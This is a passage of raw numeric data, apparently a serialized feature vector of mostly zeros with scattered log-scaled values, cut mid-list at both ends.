0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 1.9459101490553132, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 1.7412592803704001, 0, 0.0, 0.0, 1.9459101490553132,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.772588722239781, 0, 0, \n 2.6390573296152584, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.8398715690385097, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 1.3862943611198906, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 2.0794415416798357, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 1.0986122886681098, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 2.8398715690385097, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 4.490536906871891, 0.0, 0.0, 0.0, 3.5263605246161616, \n 2.550898738446989, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 4.160336650881089, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.833213344056216, \n 2.550898738446989, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 2.9444389791664403, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 2.9444389791664403, 0.0, 0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 4.02535169073515, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 4.292158018817389,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 1.3862943611198906, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 3.258096538021482, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 3.2188758248682006, 0, 2.4849066497880004, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 2.0794415416798357, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 4.290459441148391, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 4.31748811353631, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.5649493574615367, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 1.6094379124341003, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 3.4657359027997265, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 2.4849066497880004, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 3.4339872044851467, 0, 0.0, 0.0, 0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 1.0986122886681098, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 2.772588722239781, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.2188758248682006, \n 2.1972245773362196, 3.4825185607408002, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.2237778411112, 0.0, 0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 3.9512437185814275, 7.983380992735443, 0.0, 0.0,\n 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0,\n 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.0986122886681098, 0.0, 0.0, 0, 7.917171988845775, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.6094379124341003, 0.0, 0.0, 0.0, 2.8398715690385097, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, \n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.1588830833596715, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 2.9444389791664403, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0, \n 0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 3.044522437723423, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 3.295836866004329, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.6931471805599453, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 1.0986122886681098, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.833213344056216, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 3.2188758248682006, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 1.0986122886681098, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 4.969640753475787, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0, 5.723585101952381, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 1.0986122886681098, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.3862943611198906, 0.0, 5.101797476893978, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 5.76977456331519, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0, 0, \n 0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, \n 0.0, 0, 0.0, 0.0, 1.0986122886681098, 0, 0.0, 0.0, 2.550898738446989, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 2.70805020110221, 0.0, 0.0, 2.1972245773362196, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, \n 7.000208219919599, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 3.2188758248682006, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 1.9459101490553132, 0, 0.0, 0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 3.8066624897703196, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 4.143134726391533, 0, 0, 0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0, 3.0841946160253872, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 